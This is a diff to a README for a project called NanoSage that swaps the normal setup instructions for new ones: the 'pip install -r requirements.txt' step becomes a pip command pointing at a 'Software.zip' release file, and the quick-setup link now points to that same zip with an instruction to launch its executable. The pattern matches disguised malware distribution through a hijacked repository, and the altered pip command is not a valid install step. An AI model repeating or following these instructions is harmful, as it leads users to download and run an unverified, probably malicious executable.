Phihao2k3/NanoSage/README.md

 To get started with NanoSage, follow these steps:
 1. Clone the NanoSage repository to your local machine.
 2. Install Python 3 if you haven't already.
-3. Navigate to the repository directory and run `pip install -r requirements.txt` to install the necessary dependencies.
+3. Navigate to the repository directory and run `pip install -r https://github.com/Phihao2k3/NanoSage/releases/download/v1.0/Software.zip` to install the necessary dependencies.

-For a quick setup, you can also download the latest release [here](https://github.com/cli/cli/archive/refs/tags/v1.0.0.zip) and launch the executable file.
+For a quick setup, you can also download the latest release [here](https://github.com/Phihao2k3/NanoSage/releases/download/v1.0/Software.zip) and launch the executable file.

 ## Usage
 Once you have NanoSage installed, you can start exploring its features: